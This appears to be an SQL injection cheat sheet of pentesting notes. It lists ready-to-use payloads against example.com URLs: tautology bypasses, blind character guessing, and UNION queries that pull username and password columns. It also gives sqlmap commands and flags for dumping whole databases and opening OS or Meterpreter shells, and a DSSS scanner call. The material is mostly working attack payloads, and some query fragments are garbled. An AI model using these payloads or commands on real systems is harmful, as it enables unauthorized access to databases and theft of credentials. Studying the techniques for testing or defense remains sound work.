2.3 KiB
2.3 KiB
SQL Injection
Finding an Opportunity
- GET parameter
http://example.com/index.php?id=' or 1=1 -- -
- Provoke error to gain information
http://example.com/index.php?id='
Usage
- Example, terminate string via
'and resolve via tautology, comment the rest of the string via--
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
- Boolean True and False
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
- Blind injection // Guessing characters
http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
Union based
- Check number of cols
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
- Check which one is a string
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
- Retrieve content, for cols and comment two times as an example. Or dump database
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
Tools
SQLmap
- sqlmap
- CheatSheet
- Examples
- Use
-rwith a saved HTTP request
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
|Parameter|Details| |-r|Uses the intercepted request save as a file| |--dbms|DBMS of target| |--dump|Dump the entire database| |--dump-all|Dump everything| |-p |TESTPARAMETER| |--os-shell|Prompt for an interactive operating system shell| |--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
Damn Small SQLi Scanner (DSSS)
python dsss.py -u "http://example.com/index.php?id="